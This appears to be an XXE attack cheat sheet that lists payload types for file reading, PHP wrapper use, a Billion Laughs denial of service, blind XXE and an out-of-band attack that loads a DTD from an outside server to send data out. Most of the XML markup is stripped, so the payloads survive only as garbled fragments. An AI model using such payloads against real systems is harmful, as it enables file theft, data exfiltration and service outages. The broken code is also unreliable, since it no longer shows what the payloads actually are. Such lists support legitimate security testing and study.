# XML External Entity An XML External Entity attack is a type of attack against an application that parses XML input ## Exploit Basic Test ``` ]> John &example; ``` Classic XXE ``` ]> &file; ``` Classic XXE Base64 encoded ``` %init; ]> ``` PHP Wrapper inside XXE ``` ]> Jean &xxe; Dupont 00 11 22 33 44 42 rue du CTF 75000 Paris ``` Deny Of Service - Billion Laugh Attack ``` ]> &a4; ``` Blind XXE ``` ] > &callhome; ``` XXE OOB Attack (Yunusov, 2013) ``` &send; File stored on http://publicServer.com/parameterEntity_oob.dtd "> %all; ``` ## Thanks to * https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing